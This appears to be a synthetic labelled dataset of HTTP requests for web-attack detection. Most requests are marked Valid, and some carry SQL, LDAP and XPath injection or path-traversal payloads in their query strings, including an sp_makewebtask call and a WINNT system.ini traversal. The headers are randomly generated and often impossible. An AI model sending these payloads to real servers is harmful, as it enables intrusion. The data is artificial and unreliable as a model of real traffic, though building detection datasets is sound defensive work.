Trailer: Range
User-Agent: 5jQJRey_y http://www.hVis.it
UA-CPU: StrongARM
UA-Disp: 427,3177,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 122x540
Via: pen/3.9 www.netdBan7.png, 8l2i/4.1 www.igeeddb.tiff
Transfer-Encoding: identity
Upgrade: iasi6m/1.5, ep9/4.9, ip9nui/4.5
Warning: 760 227.98.126.37 "nIw39hepCclatnett8" "Tue, 06 Nov 07 04:36:32 GMT"
X-Forwarded-For: 192.195.46.225
X-Serial-Number: 9696710
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49594
Start - Id: 24846
class: Valid
GET /aodii8otaG6pswPiYe/9K/8uQQAFb9K/h06.gif?MnUer1u23spwmE=v%3Ctpheytk3uiu&5iraIs=ao0iooesr&rysj0cies=brbos&oaoc=99&ueehcss=o HTTP/1.0
Host: 153.45.190.98:52
Connection: jhguar
Accept: text/xml;q=0.7, application/*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: fttd-deam, e-qoeta
Cache-Control: max-age=5294
Client-ip: 210.248.202.218
Cookie: Iokwi5Inri=t9thle+5hnllo:Mc;lonhcto=cdtprocessing-instructioni r
Cookie2: $Version="62"
Date: Sun, 07 Nov 04 01:11:59 UTC
ETag: "883v8r9qqXuQlha9BK.D"
Expect: kdoifc=dfiooiv;hrltuba
From: neyaahot@swrEr.com
If-Modified-Since: Tue, 18 Mar 08 02:13:34 UTC
If-Unmodified-Since: Mon, 20 Nov 06 09:22:02 GMT
If-Match: "WNEZlW5Tw9J@sePHDP"
If-None-Match: *
If-Range: ".m4ApFZmBP8lW1z"
Max-Forwards: 9845
MIME-Version: 1.3
Pragma: fm=Eyicont
Proxy-Authorization: ue3ee emteai=apsdea
Authorization: Basic ZXNhZWhlYzpjcjhzdGly
Range: 765-4,5088-267
Referer: /opeer5oi.mdb
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/1.0 (Windows; U; WinNT 3.1; eL-zz; rv:1.2.5) Gecko/36618283
UA-CPU: StrongARM
UA-Disp: 9323,238,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 1270x925
Via: 7.6 www.hex9i3s.jpg, 9.5 104.185.4.56
Transfer-Encoding: gzip
Upgrade: eThto/9.1, osm3d/8.9, tnv9v/5.6
Warning: 263 www.erua.shtml "en3htre" "Wed, 19 Mar 08 13:49:31 UTC"
X-Forwarded-For: 185.160.195.192
X-Serial-Number: 934492
----: --------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 24846
Start - Id: 26495
class: Valid
GET /merij/lteceiNissoody.swf? HTTP/1.1
Host: www.awhIS.fr
Connection: close
Accept: image/*, audio/*;q=0.4, audio/x-wav;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 196.239.181.136
Cookie: 70httpspasswd9=;tlacceptecho;eZhet=2Yx;p3BdeeSro=hB3s
Cookie2: $Version="84"
Date: Sat, 03 Apr 10 12:56:27 GMT
ETag: W/"kpvX@IInxSxRK4Ag9@d"
Expect: 100-continue
From: r2Sewei@iiwioe8s.st
If-Modified-Since: Thu, 11 Jan 07 16:55:23 GMT
If-Unmodified-Since: Wed, 03 Jan 07 10:09:29 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 23 Jun 06 10:39:30 GMT
Max-Forwards: 882
MIME-Version: 5.1
Pragma: t8=ceTib
Proxy-Authorization: Basic OGh0bndTbjpvZHI3clNz
Authorization: Digest uri=http://niisrsn.be/jwA4lst/xdensa/dcs1iat/rehi.bin
Range: -394,77057-
Referer: http://www.qsehiar.de/ryatasmv/diders/rouuarsn.fgf
TE: trailers,trailers,deflate;q=0.2
Trailer: Proxy-Authorization
User-Agent: 2sneidqlL/2.3.0.9
UA-CPU: StrongARM
UA-Disp: 9620,0046,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 701x092
Via: 9.9 www.i4nA.jpg, 2.7 154.234.203.246, tmcnOn/9.7 179.17.203.104
Transfer-Encoding: compress
Upgrade: e7rni/4.8, eefgnj/9.6, ensu/8.5, oOfs/2.8
Warning: 294 240.99.80.175 "5vdbnr43n" "Sat, 21 Jun 08 18:51:20 UTC"
X-Forwarded-For: 135.109.117.133
X-Serial-Number: 7639559480776
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26495
Start - Id: 35063
class: SqlInjection
GET /ceTaaotsis/eU/lh7ie0wu/Dre/IUzchildiTU/eq9ve6s/kZfrombodyk/lQR2WUvkgdR/e8etwecvchnRavlsfId.cgi?txmthetntre1=1&A4Ng=5294892496&ltr=ehavingegscript+utiw&mJwK3cmdyu5lq=l+t%2Fcsr1r&dqayjEl2e=%7Ce&eelmatic=1&eIhB=1167&IO1e=se%25at&lsieodl6toaa7=j+&o3im=zo8g&4y1JD3=%27%3B+EXEC+master.dbo.sp_makewebtask+++++%27c%3A%5Cinetpub%5Cwwwroot%5C2xvejt.htm%27%2C+++++%27SELECT+++oPtepaqy++FROM+++++a6dPs++WHERE+++++xtype%3D%27%27U%27%27%27&hqtsrd6mi2lecr=e2ii%2Fe%3Frcpl&EBwQxhpnc9O=779023 HTTP/1.0
Host: 59.106.79.223:80
Connection: aqe1a
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: iiep-4
Cache-Control: no-transform
Client-ip: 218.136.16.31
Cookie: avseo1n=8;fude9eecrt=2544;y@ZYqT7=3
Cookie2: $Version="63"
Date: Sun, 17 Jun 07 18:33:20 CET
ETag: W/"01D.7MwmuewGPdIUlo"
Expect: 100-continue
From: tigt@7oor.cz
If-Modified-Since: Wed, 25 Jun 08 04:00:08 CET
If-Unmodified-Since: Thu, 01 Apr 04 17:27:30 CET
If-Match: "X7S3xoKnir1uTmU"
If-None-Match: "txuDyXJFhHb5Giam"
If-Range: Thu, 03 Sep 09 15:31:27 GMT
Max-Forwards: 8315
MIME-Version: 0.3
Pragma: giAew=ndae0
Proxy-Authorization: NTLM eXlvbGk4ZG8yMm5saG50bWw1c2FncmFzYnRsZHJqc2F0aW96YQ==
Authorization: NTLM ZGFsaTYwdHlyMW5vUmNzY2FnaWJpd2RlVW1hZWlGcG5BZWlob2Q0aWVz
Range: 478-841920,54-454132
Referer: /tncs/a7u3/atbo/s1ihUrty.wmn
TE: trailers,deflate
Trailer: Accept-Encoding
User-Agent: nltrgRues
UA-CPU: 68000
UA-Disp: 075,716,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 989x6143
Via: HTTP/0.1 www.nthD.htm, HTTP/6.0 www.uet4te.gif, HTTP/0.7 www.dtUe.tiff
Transfer-Encoding: gzip
Upgrade: l5i/1.7, lDqw/9.3, ade/1.3, rst/9.9
Warning: 825 www.eezs.png:4813 "dnlyiz8ddawi9eucren" 
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35063
Start - Id: 21221
class: Valid
GET /rntnIcolSeo/ImKywdroppositionOPlbGHT/4tfrt9hhza/la7aaor/nw.qzR5T815na/ng7qPErM/UnehjYVzmG/f.B@QUHwjl@Sy.mspx?t4=1g6o&ppw75jmvethno=orrtrseenvsne&5x3vbscriptn=+97 HTTP/1.0
Host: www.6eu3rS.gov
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: iso-2022-kr, iso-8859-3
Accept-Encoding: 
Accept-Language: Ean8ua-uoqee;q=0.8, dspOt-btaqea, lceiu-V9;q=0.6, xir-ecuxere;q=0.6, ate-ai3aeiee;q=0.6
Cache-Control: max-stale
Client-ip: 94.29.16.110
Cookie: Sbin2z3=am&t
Cookie2: $Version="685"
Date: Wed, 12 May 04 13:38:18 GMT
ETag: "@EZZgwiZh.TuglG"
Expect: 100-continue
From: vEvaeak@i1auid.st
If-Modified-Since: Tue, 12 Apr 05 03:43:44 CET
If-Unmodified-Since: Tue, 29 Jul 08 11:30:29 GMT
If-Match: *
If-None-Match: "4KBGVEl0ei4T.WpZ"
If-Range: *
Max-Forwards: 856
MIME-Version: 6.1
Pragma: sZhrI='6'
Proxy-Authorization: NTLM bG50cnNtemhjbWlPdGRlM2tWY3BlcmNDNmlpb2JneWlyd2FleFRTb2ZpaWhoag==
Authorization: Digest nc=0fb7AfdE
Range: 6-557772
Referer: http://www.ttyRdns.fr/0eatdc7z/te4is/9mzbue.mspx
TE: chunked,deflate
Trailer: Upgrade
User-Agent: ey3kgj7dXd http://www.ftimhts.cz
UA-CPU: MIPS
UA-Disp: 158,905,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7822x0790
Via: FTP/5.4 www.nis1.tiff
Transfer-Encoding: identity
Upgrade: paa/5.3, a9Au/8.0
Warning: 474 205.133.110.111 "znelncj" "Mon, 25 Jan 10 21:18:40 UTC"
X-Forwarded-For: 235.168.20.114
X-Serial-Number: 51497571
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21221
Start - Id: 28415
class: Valid
GET /aEcI644IcpEHgEKByU/VG17Sae67m67wP_/oYdNVQ@oAkf6/nl@ZsOITc6sz3cF/3fkaAoZWIv0NCwe1Kk/ooltUpo59tiradnv1/7uq5KJHzoZ2zzM_Q/eil9elbaoajtslcRncn3/QY2ndPeq-PjV/ei6oa07vueaauseaslun.sh?indtiroan=0420000&vu=+ieak6te&suiht=%25ett+rr%3DbW&neerkceonQ=e4Z HTTP/1.0
Host: 194.251.81.210:80
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: *;q=0.8
Accept-Encoding: gzip, gzip;q=0.7, gzip
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 44.60.248.223
Cookie: lna=qmen;MNinsertX=61526460;thiWho=893;csp8upohecgzrv=cAkiboWHx;qt=hIeeers;iraTemuwoxj=9
Cookie2: $Version="7"
Date: Wed, 30 Jun 04 13:34:04 GMT
ETag: "isJ.RakVJ4zGzLfLj6N0"
Expect: egtT5nm=u6gmeta
From: oBcae9t@txO3eond.biz
If-Modified-Since: Tue, 16 May 06 20:59:56 GMT
If-Unmodified-Since: Wed, 17 Mar 10 11:19:22 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 21 Mar 06 20:46:04 UTC
Max-Forwards: 6
MIME-Version: 6.3
Pragma: 7tdsn='apse'
Proxy-Authorization: Digest opaque="hao5Qae"
Authorization: Digest algorithm=fnsodszp
Range: 9246-,43437-,-51100
Referer: /eu00l/hditjwi/NGml5ie6/Tws2lOne/totcnw.php3
TE: gzip,chunked,trailers
Trailer: If-Range
User-Agent: Mozilla/6.9 (Machintosh; U; PPC Mac OS X 0.2; Ou-tz; rv:8.3.3) Gecko/69282908
UA-CPU: PowerPC
UA-Disp: 243,084,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8839x0897
Via: e9mb/7.2 229.27.195.193, 5.5 www.einhoRbo.jpg, 3.0 www.ytHid.css
Transfer-Encoding: ioic; Ntrpjm=teax
Upgrade: amS6d/3.8, 8edpw/2.9, mdo/8.0
Warning: 999 www.inZhH.jpeg:2 "ret1" 
X-Forwarded-For: 7.153.57.18
X-Serial-Number: 15983235
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28415
Start - Id: 33557
class: Valid
PUT /iClr_RCs/2OM/mknC/udwauwl1ot9otelpaing/OOAziframekvuxqc/t6aW/bi2ueieiNihpoaa9/ctexMgHpIXjX5o/eeEsoaa2sseutuny/6nDsvDTEcVWsUZdYR7oZ.msf? HTTP/1.0
Content-Length: 48
Content-Language: hwgnei,srtl
Content-Encoding: deflate
Content-Location: http://gtl0enbx.it/lRheosa.nsf
Content-MD5: TGRhb0VhNnVnaXVlc2V5eQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 14 Oct 09 21:55:19 GMT
Last-Modified: Wed, 30 Jul 08 01:50:46 GMT
Host: www.aoeU.de
Connection: arfmisv
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: n0-azea9
Cache-Control: no-cache
Client-ip: 83.91.209.204
Cookie: rlh=aee8mejaaishclwz;nehg4=4055642;tr3sy=17873;st8tgisehdqi=8;lilsielwsdoeh=oUkQrU6Or_mr
Cookie2: $Version="835"
Date: Thu, 17 Jun 04 23:40:51 UTC
ETag: W/"G4y63TaRjt6qV8P5.YwZ"
Expect: 100-continue
From: nndz@n7ls.fr
If-Modified-Since: Mon, 27 Feb 06 23:32:09 UTC
If-Unmodified-Since: Sat, 31 Jan 09 07:54:03 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 19 May 09 02:24:45 CET
Max-Forwards: 9
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM aXJlbHBlNHRsazdsbGZpbmh0cmVpZXNzdXlnbGVrN2lpbjZuc2ZlMW90ZXJy
Authorization: yeeeFa snima=celoHr
Range: -842
Referer: http://www.8Tiouner.cz/tcoye7tz/se0h5j.png
TE: trailers,gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.5 (Machintosh; U; PPC Mac OS X 8.5; ad-sf; rv:6.9.7) Gecko/17677100
UA-CPU: PowerPC
UA-Disp: 3018,583,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 417x756
Via: 2.8 www.ofBdnsls.shtml:8
Transfer-Encoding: compress
Upgrade: rgdr/2.7, pttC/2.5, tte/1.7, eqltXw/6.0, NuhE/6.5
Warning: 643 www.ra6U.htm:54672 "saen" 
X-Forwarded-For: 188.249.94.253
X-Serial-Number: 2914047
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tmnSaegh=o93Yl7I@_qh&hzenObtlyoo=e irzlmr@ee

End - Id: 33557
Start - Id: 17702
class: Valid
GET /Ldieseia/Qls4ushutdownLbinHobjectFWW/yUilHavQrv9zE0247t_v/6u3uypw-f.gif? HTTP/1.0
Host: 185.207.141.0
Connection: keep-alive
Accept: video/mpeg, audio/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: Hwhre=deideot
Client-ip: 109.42.54.64
Cookie: eTshvhsrdtGml=5682316;hn=vgedpluE2O;M0homeOallHdwa@Heval=38;ctts=<[;tseE=5;2@.RnhJG=ehdci~G:
Cookie2: $Version="8"
Date: Sat, 25 Jul 09 07:04:09 CET
ETag: W/"RlvvOiuDFYgKT3Y@_L"
Expect: dIhE=yjonsoC;cjwnf
From: ham2@rhhtcs.de
If-Modified-Since: Tue, 29 Jan 08 08:19:08 UTC
If-Unmodified-Since: Sun, 02 Jul 06 04:33:43 CET
If-Match: *
If-None-Match: "dBz_FfbAVTRxusjboD"
If-Range: *
Max-Forwards: 5
MIME-Version: 9.0
Pragma: or='ex4in'
Proxy-Authorization: Basic bmdvY2g6bWNpdTlp
Authorization: AMsas teetvwf=eidyws
Range: -579,-690
Referer: http://www.shmlmo4u.gov/eruen28u/xseQ5tne/q8rmnat/tlqvp.bin
TE: deflate;q=0.7,gzip;q=0.8
Trailer: Upgrade
User-Agent: 7elrw/4.5.1
UA-CPU: x86
UA-Disp: 4852,629,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 7830x724
Via: 3.5 179.155.178.211, 5.3 www.mrat2.jpeg
Transfer-Encoding: deflate
Upgrade: 4rd/7.7, enhn/4.6, cfe/5.9
Warning: 693 205.206.134.117 "rkctrioeeS1hAa" "Mon, 18 Dec 06 11:42:54 CET"
X-Forwarded-For: 167.172.138.87
X-Serial-Number: 1990528944468
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17702
Start - Id: 37998
class: LdapInjection
GET /ihaVe/xQczp-5RNzUwDny/et/xoIIgl/eRQ5KC9DQy@Px3IMCR.bin?.dSu=7158577&almteotudzmsoey=o.nXP.UP88n&hw0rhdrnes=76665&xzbb2ethcEqwkt=441&xiN6Q9._=oatoam7nunareoek&Lerlo3hdsF=pcnif&hntls=7749372951&2ITls=n48x%29%28++++%7C+++%28nv%3D*%29&lan=%40hb HTTP/1.0
Host: www.snt6aelO0e.st
Connection: urdEScT
Accept: */*;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: compress;q=0.7, compress, gzip
Accept-Language: loyl-nOoe9, yavtsroe-er8r;q=0.1, k-uaotStr;q=0.0, 6-hyeb;q=0.6
Cache-Control: ixa8a=wCns0lqg
Client-ip: 146.146.211.242
Cookie: 8uorvoda08toasj=i
Cookie2: $Version="410"
Date: Mon, 10 Nov 08 02:25:57 CET
ETag: W/"UDst@tJde@GHR5NuG09g"
Expect: 100-continue
From: inr9@eduqt.it
If-Modified-Since: Wed, 11 Aug 04 15:04:12 UTC
If-Unmodified-Since: Mon, 02 Nov 09 22:44:33 GMT
If-Match: "XfPYp@zQmIsrWy."
If-None-Match: *
If-Range: "_Vj9akHjnAW@XaoyCw"
Max-Forwards: 612
MIME-Version: 4.1
Pragma: onei='etmipext'
Proxy-Authorization: Digest opaque="tnharvec"
Authorization: tcxniu pbhHs=eaSs
Range: -90
Referer: http://rlssd2e.fr/hlTena/ienhsNe/uvxs/mbe4s/isuthU.asp
TE: trailers,chunked
Trailer: TE
User-Agent: aitrTzheor3
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 880x8476
Via: HTTP/6.3 www.errao0ed.js, 3.5 www.sitdhnlh.html
Transfer-Encoding: compress
Upgrade: 6isty/2.9, aeiotr/0.1
Warning: 489 www.2ueh.shtml "ll6uon" "Mon, 01 Aug 05 13:30:03 CET"
X-Forwarded-For: 69.225.134.146
X-Serial-Number: 800649
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37998
Start - Id: 5620
class: Valid
POST /nDjKcwC1H6tgdMQ02a_W/rawonw/0eoyo9fA4noIo6ueecp/uDrssesattyvAstjosyt/fHoXfNE8X661a_Z6a2eC/2SLA8kWhtFaM2khZGGcv.pl? HTTP/1.0
Content-Length: 257
Content-Language: ib
Content-Encoding: deflate
Content-Location: http://oetrt3.org/eolnde/Ctee/sd9psEG8/tmln6sw.tiff
Content-MD5: c3NsTmx1bGRidGVpaGVqZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 04 Aug 08 11:05:57 GMT
Last-Modified: Tue, 27 Nov 07 06:48:47 GMT
Host: www.nrEtr.cz:1
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-jp, x-mac-japanese;q=0.3, x-mac-greek;q=0.6, euc-tw
Accept-Encoding: *;q=0.1
Accept-Language: wfu0hoi-Suixhnv3, Fusoe-ioake7o;q=0.8, 7-Fomo, e7MEe6d-rday0, rb4oex-y;q=0.4
Cache-Control: max-stale
Client-ip: 101.218.67.81
Cookie: emws=[stdinpjjesecbshi@qqS;ea=i0a0hs;eie6drzjz=0700;Ta9raehedmjt=1
Cookie2: $Version="74"
Date: Mon, 26 Feb 07 16:47:40 UTC
ETag: "bcRo.rDFW3u19MgT"
Expect: idqica2
From: frbac@ngi0nanafk.biz
If-Modified-Since: Tue, 20 Feb 07 24:54:43 CET
If-Unmodified-Since: Sat, 19 Feb 05 13:50:15 GMT
If-Match: "AmFCQ_9DMi07m1-4"
If-None-Match: *
If-Range: Fri, 23 Jan 04 19:08:12 UTC
Max-Forwards: 344
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM aWVmZWpnYWlnbW9kZXJlZE55YTJmRVQ5ZVRFc2VlaHRhZXk=
Authorization: Basic dG50bjphekRRYXJ0
Range: 67795-,06619-,662301-47622
Referer: http://eabBIi.st/mhtnZ5/1nshRi/tbdSx/ygOefi.swf
TE: gzip
Trailer: If-Modified-Since
User-Agent: esNiSesf/0.2.2.9.0
UA-CPU: PowerPC
UA-Disp: 6817,0716,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 0202x3743
Via: cu7ae/6.2 www.e4l0.jpeg, FTP/7.8 202.231.227.2, HTTP/0.7 www.sced.gif
Transfer-Encoding: gzip
Upgrade: itsx/1.1, sjNs/5.5, rsIR/6.3, teTe/2.5
Warning: 803 145.78.232.247 "ihmqhTtecao" "Wed, 20 Aug 08 01:29:34 GMT"
X-Forwarded-For: 253.42.32.113
X-Serial-Number: 382947508350489867
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

Sdan=hatsh0srdhnueauot&zeieOe=9&enhsTo9asel=GworgnkfotntetEr&tykou0=ld1rcuvr&mmedsBiNye=Ecsnbnnubcrs&xo=i6W&S9=hh9RMou&2z.LmXGLecho=kaneftpsinDsscriptolh&9n=boMtgnda&iotOnpieit=t7erEbx5 xxmldododa=ebody&gieTttaaedoi=ha4y&dxml4K0iXH=ecattsmetar:asac[jh

End - Id: 5620
Start - Id: 49301
class: XPathInjection
GET /sqG.iaXW_/oae/ym/nxBtgelno/eZDwh6lx0N4qLtdyLp4/evcniczendo4EYe/ej0SzwL/@IZiZxf/7PDvppXzHC97te0wv/i5ciuo5eoomn/oDMJamselectTWcVyH/oXxD.cgi?aspsmeee7kd=Slitatf7m&hlt=oripstandxajue&tvhtw1tlekwb=gaike%27%5D++++%7C++P++%7C+++++%2F%2Fuser%5B++++name%2Ftext%28++++%29%3D+%27tn0ie&rleii6mnwabni=tmxpXi&ulu=rl%3Fu%7E&52ereIed=92&tvpQ=pevalonhtaoTh&wfd0yscrv1=tbeamtedrdi5jGral&ZouiRfae3=Tasrher%3Ba&owhmka0e=iQFW%401T4.7LG&egatd=no%28ir&cjc5frb3tne=avnwt+hfidfrom&e6rMtustn=9 HTTP/1.1
Host: www.4rdaafvRoe.be
Connection: close
Accept: image/*;q=0.8, application/*, video/*;q=0.0
Accept-Charset: hz-gb-2312, iso-8859-6;q=0.1, euc-kr
Accept-Encoding: *;q=0.9
Accept-Language: tz4-ieibdm, ccaenedn-limc5edT, hnuiis-A8ot;q=0.1
Cache-Control: max-stale
Client-ip: 249.173.49.26
Cookie: arh=9;uoemerdEB=23684;aa=txmlobjectidl;gyd=h deleteuu;tear8el=8sh
Cookie2: $Version="05"
Date: Mon, 24 Nov 08 21:56:24 CET
ETag: W/"5oOwunHRVio4Nk9"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Fri, 30 Jul 04 24:56:24 CET
If-Unmodified-Since: Thu, 28 Jun 07 14:23:20 GMT
If-Match: *
If-None-Match: "2NWGpcldd8lm8Nj"
If-Range: Wed, 13 Jun 07 01:41:23 UTC
Max-Forwards: 29
MIME-Version: 9.1
Pragma: meres5='ag'
Proxy-Authorization: NTLM YmVlaHJpZVNvNXlmamZwYW4xYWRydDdod3Noc3NsT3RrM280aWw=
Authorization: Basic ZVNFSlU6MDR0bGNl
Range: 762-
Referer: http://atemrwo.be/eeeelrs/rdib/yEbr.exe
TE: chunked
Trailer: Trailer
User-Agent: vbSitiz/6.2.7.7.6
UA-CPU: MIPS
UA-Disp: 284,977,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7516x496
Via: 8.7 www.R8ag.htm
Transfer-Encoding: identity
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 119 www.rMrCoeV.png "areeivlaiau9le2Crr" "Wed, 01 Jul 09 21:10:21 UTC"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 15070707581939695
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49301
Start - Id: 30115
class: Valid
GET /59X/coyr1fne/bpfptrto0crdfeoabh/iaeasyotseweofjihp/n5/oS-qGAY-slZOPUxj9z4J/zdSxFI/9eFLD7Ufk/@@WbinfQlhXHZFPZ.aspx?Srtm=2gieoe2IN9&tscsenaeaes=53900&JF0YeftpUr=%5CQ&uO7taee=fnEloylg%7C&cpeKclr0swehka=hwERLZ3-n8.3&dhZybGX=zl6ait&et=f8h&0us6oelikamnuM=csam%3C3s%24%28mrUzscripten1ti%2Blocationi&mrtioEhnd=4283&8optArn=88 HTTP/1.0
Host: www.esEtdtau.cz
Connection: weett
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ng-ROiteqei
Cache-Control: min-fresh=88
Client-ip: 66.154.126.17
Cookie: mtst=2123201;c1=79;75ijMngtdrKbems=iframeTYtd;eoIbtesieo=ilsofMTamhn
Cookie2: $Version="0"
Date: Tue, 26 Dec 06 16:57:43 GMT
ETag: "r1jtsqj1MClaap3WG92"
Expect: 100-continue
From: iustaSag@Odyltrr.it
If-Modified-Since: Thu, 31 Dec 09 04:05:24 UTC
If-Unmodified-Since: Mon, 29 Jan 07 04:15:01 CET
If-Match: "T1JjdutVjY8vQLF"
If-None-Match: "Sj7@kX9HZ3V.3jGys4"
If-Range: Fri, 16 Jun 06 19:57:20 GMT
Max-Forwards: 3208
MIME-Version: 1.5
Pragma: d='hch5aont'
Proxy-Authorization: NTLM c3RZbmdoanF0Vm1RYmlhb2ttd3J0b3NuZWtzbHJiaG5vbWFuNGxv
Authorization: tofin fxTiist=4hqeat
Range: -3400,603295-
Referer: /Cown2hi/ldfsEeaT.js
TE: gzip
Trailer: Date
User-Agent: fyK6Tp8k http://www.gcdbhchd.st
UA-CPU: 68000
UA-Disp: 0585,478,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 118x9358
Via: 7.5 www.pbtlsll5.html:0815, 2.3 61.51.127.101
Transfer-Encoding: deflate
Upgrade: atUnh/6.9, c0y/8.9, Tr3Ld/2.0, m2seTE/9.9, df38/8.9
Warning: 166 93.46.119.175 "apeeou6Udinzauet" "Thu, 11 Dec 08 02:46:24 UTC"
X-Forwarded-For: 110.208.121.15
X-Serial-Number: 131299472861769232
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30115
Start - Id: 36159
class: PathTransversal
GET /socqotnonoif/inbroyl/njtoEU/08A50a/zwbceartqYeEO8i1rsea.jsp?cie=yEuetnhoctde&CwhtpassCXJBYK=..........................WINNTsystem.ini&y1oesaxwiprm=sl0n&2WauonahaIatDd=hCeccabtn%3F%29kdgt&dsadAaus=432738&ce9=bu&SEoLVMNT=184&zcStnEgtg=53307&position7OZhtpasswindow.open80b6=035902389&emiutnv=clji9deueec&caPllmfeeHtal1=ih+rtpoo&eBtdd1Bhrh=b7F&hrrmdnuetide4=t%3DazmsSbi%3AttornwEe&osertl0gg=25 HTTP/1.1
Host: www.wxsew.ch
Connection: close
Accept: video/quicktime;q=0.0, text/xml;q=0.9
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.1, deflate;q=0.1, compress;q=0.7, gzip;q=0.9
Accept-Language: nI-ocha;q=0.4, lsI7aAl-9a0oioy, o-ptdncdwo;q=0.2
Cache-Control: max-age=7
Date: Wed, 29 Nov 06 11:55:59 GMT
ETag: W/"p7qElbYY5v6UDzs4VZ"
Expect: 100-continue
From: rmee3leS@lenn.de
If-Modified-Since: Thu, 10 Dec 09 09:32:25 UTC
If-Unmodified-Since: Thu, 05 Apr 07 22:10:32 GMT
If-Match: "ElzUMg79vsWjlYT-UWa"
If-None-Match: "M@frtrP9rfkNK5FazTwO"
Max-Forwards: 9
Pragma: emug=edieona
Proxy-Authorization: Basic Nmk1OGlyOnNIb2VmZQ==
Authorization: Basic ZmNpc2VkOnNob2M=
Range: -5335
Referer: http://lfhr.it/5sein.txt
TE: deflate;q=0.2,gzip;q=0.1
Trailer: Accept-Encoding
User-Agent: Mozilla/3.9 (Windows; U; Win 9x 8.6; da-s6; rv:4.3.7) Gecko/94097634
UA-Color: color8
UA-Pixels: 5546x388
Via: HTTP/7.8 www.tuen.html
Transfer-Encoding: ensiie
Warning: 176 103.233.4.139 "gothscr7a4n" 
X-Forwarded-For: 11.225.138.134
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36159
Start - Id: 26135
class: Valid
GET /PAscript8aZyMFF/imN7jxOGK/CkSbetween6XB/w9simdEoxstttvt/httrii/bt9gomQpwtzaleMeeirt/doKh/tlzadhlicait/QodwgetfP7M/hxES/ajobzthkhtngit.aspx?htxgSof=pv5G&Zaee2s=%2Bilike2t&Yjouniondu-=mwhRdoZ_wL&wolta=2233 HTTP/1.0
Host: 215.125.47.62
Connection: keep-alive
Accept: text/xml;q=0.2, audio/*;q=0.8, audio/*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: min-fresh=671
Client-ip: 239.116.234.200
Cookie: nl=N?hj;yyttiSi=erennuzieoetr9e;eht3vserLddtioo=inagosett
Cookie2: $Version="56"
Date: Wed, 12 Mar 08 15:31:42 GMT
ETag: W/"@ZbWJrX5JWCshILF6td"
Expect: oantTa=i2iwtls;biarhnn
From: xeno@faL1.st
If-Modified-Since: Tue, 06 Mar 07 07:11:27 CET
If-Unmodified-Since: Wed, 13 May 09 16:11:12 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 17 Nov 09 21:56:37 UTC
Max-Forwards: 824
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM ZXN0MmVvbjBzdGlhbGwxbWNvQTUybmVsSWVlNWx0ZWllZWlWYWFsbnNicG8=
Authorization: Basic dHR3cjBUdDppaG84
Range: -076,520453-4710
Referer: http://emiahfc.uk/ir1vl/intnqeto.mdb
TE: trailers,chunked,trailers
Trailer: Warning
User-Agent: Mozilla/6.9 (compatible; MSIE 4.8; Unix; eceaetta; eIao6)
UA-CPU: Sparc
